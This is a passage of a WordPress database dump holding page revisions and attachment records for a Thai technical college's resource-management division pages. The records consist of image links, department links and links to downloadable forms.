src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 13:01:16', '2018-03-07 06:01:16', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1600, 3, '2018-03-07 13:05:41', '2018-03-07 06:05:41', '', '7-3-2561 13-06-42', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-06-42', '', '', '2018-03-07 13:05:41', '2018-03-07 06:05:41', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg', 0, 'attachment', 'image/jpeg', 0),
(1601, 3, '2018-03-07 13:06:11', '2018-03-07 06:06:11', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 13:06:11', '2018-03-07 06:06:11', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1602, 3, '2018-03-07 13:06:28', '2018-03-07 06:06:28', '<img class=\"aligncenter size-full wp-image-1600\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" />\r\n\r\n<img class=\"aligncenter wp-image-1473 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"385\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />', 'งานการเงิน', '', 'inherit', 'closed', 'closed', '', '1536-revision-v1', '', '', '2018-03-07 13:06:28', '2018-03-07 06:06:28', '', 1536, 'http://www.technicrayong.ac.th/1536-revision-v1/', 0, 'revision', '', 0),
(1603, 3, '2018-03-07 13:09:33', '2018-03-07 06:09:33', '', '7-3-2561 13-11-03', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-11-03', '', '', '2018-03-07 13:09:33', '2018-03-07 06:09:33', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(1604, 3, '2018-03-07 13:09:57', '2018-03-07 06:09:57', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 13:09:57', '2018-03-07 06:09:57', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1605, 3, '2018-03-07 13:10:08', '2018-03-07 06:10:08', '<img class=\"aligncenter size-full wp-image-1603\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"383\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n ', 'งานการบัญชี', '', 'inherit', 'closed', 'closed', '', '1541-revision-v1', '', '', '2018-03-07 13:10:08', '2018-03-07 06:10:08', '', 1541, 'http://www.technicrayong.ac.th/1541-revision-v1/', 0, 'revision', '', 0),
(1606, 3, '2018-03-07 13:22:49', '2018-03-07 06:22:49', '', '7-3-2561 13-18-28', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-18-28', '', '', '2018-03-07 13:22:49', '2018-03-07 06:22:49', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg', 0, 'attachment', 'image/jpeg', 0),
(1607, 3, '2018-03-07 13:22:53', '2018-03-07 06:22:53', '', '7-3-2561 13-23-48', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-23-48', '', '', '2018-03-07 13:22:53', '2018-03-07 06:22:53', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg', 0, 'attachment', 'image/jpeg', 0),
(1608, 3, '2018-03-07 13:24:04', '2018-03-07 06:24:04', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1606 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 13:24:04', '2018-03-07 06:24:04', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1609, 3, '2018-03-07 13:24:06', '2018-03-07 06:24:06', '<img class=\"aligncenter size-full wp-image-1606\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"383\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n<h4><span style=\"color: #0000ff;\">**แบบฟอร์ม สผ. (งาน) <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #ff00ff;\">**แบบฟอร์ม สผ. (แผนก)</span> <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-03-07 13:24:06', '2018-03-07 06:24:06', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(1610, 3, '2018-03-07 13:25:58', '2018-03-07 06:25:58', '', 'แบบฟอร์ม สผ.แผนก', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1-%e0%b8%aa%e0%b8%9c-%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81', '', '', '2018-03-07 13:25:58', '2018-03-07 06:25:58', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-.doc', 0, 'attachment', 'application/msword', 0),
(1612, 3, '2018-03-07 13:26:45', '2018-03-07 06:26:45', '', 'แบบฟอร์ม สผ.งาน', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1-%e0%b8%aa%e0%b8%9c-%e0%b8%87%e0%b8%b2%e0%b8%99', '', '', '2018-03-07 13:26:45', '2018-03-07 06:26:45', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-.doc', 0, 'attachment', 'application/msword', 0),
(1613, 3, '2018-03-07 13:27:58', '2018-03-07 06:27:58', '<img class=\"aligncenter size-full wp-image-1606\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"383\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n<h4><span style=\"color: #0000ff;\">** <a href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-.doc\">แบบฟอร์ม สผ.งาน</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span 